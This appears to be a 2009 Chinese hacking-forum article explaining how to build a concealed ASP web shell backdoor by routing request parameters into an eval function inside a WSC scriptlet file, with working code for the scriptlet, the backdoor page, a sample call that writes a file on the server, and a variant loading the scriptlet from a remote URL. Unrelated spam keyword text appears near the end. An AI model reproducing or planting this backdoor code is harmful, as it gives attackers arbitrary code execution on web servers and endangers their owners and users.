利用wsc來做一個asp后門及后續

作者：佚名 2009-04-27 23:29:46

利用wsc來做一個asp后門及后續……

ScriptCodingInfo.wsc代碼如下，該文件可以改成任意后綴：

以下是引用片段：
 
 
 
 
 
 
 
sub lcx(b) 
eval(b) 

end sub 
]]>

backdoor.asp內容如下：

以下是引用片段：
<% 
b=request("a") 
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop") 
fs.lcx(b) 
%>

調用方法如下：

以下是引用片段：
http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").
OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")

注意這里的a=只能是vbs的代碼，不可以接受像response、request之類的asp的東東。如果是2000服務器可以在backdoor.asp遠程調用ScriptCodingInfo.wsc，像Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop")

2003服務器中不可以。算一個思路，雞肋，誰有更好的辦法完善，能夠直接調用cs的asp木馬的c端就好了。
#p#

突然看到了lcx巨形牛頭人發了一個帖子
http://hi.baidu.com/myvbscript/blog/item/62e6204e4805dacdd0c86a6a.html
但是就像牛頭人所說的，沒有加進request和response類很不爽。于是我作了一個簡單的修改。

ScriptCodingInfo.wsc 代碼

以下是引用片段：
 
 
 
 
 
 
 
sub lcx(b,a,c) 
set response=c ’加入request和response進來。就可以直接調用了 
set request=a ’修改 by:phpeval.cn 
eval(b) 
end sub 
]]>

test.asp代碼：

<% 
b=request("a") 
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop") 
fs.lcx b,request,response 
%>

測試方法：

以下是引用片段：

不知道這是不是lcx巨形牛頭人所說的那個c端。我一直不太理解“能夠直接調用cs的asp木馬的c端就好了”lcx巨牛的這句話的意思
如果改成
Set fs = GetObject(request("b"))
然后用

以下是引用片段：
wsc%23haiyangtop&c=phpeval

這樣好象更有誘惑性。

【編輯推薦】

4.1.7 使用SQLRootKit網頁數據庫后門控制案例
入侵Windows2000系統放置后門的方法
Linux下的后門和日志工具

責任編輯：佚名來源：黑客風云

backdoor 牛頭人木馬 request 調用

成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

利用wsc來做一個asp后門及后續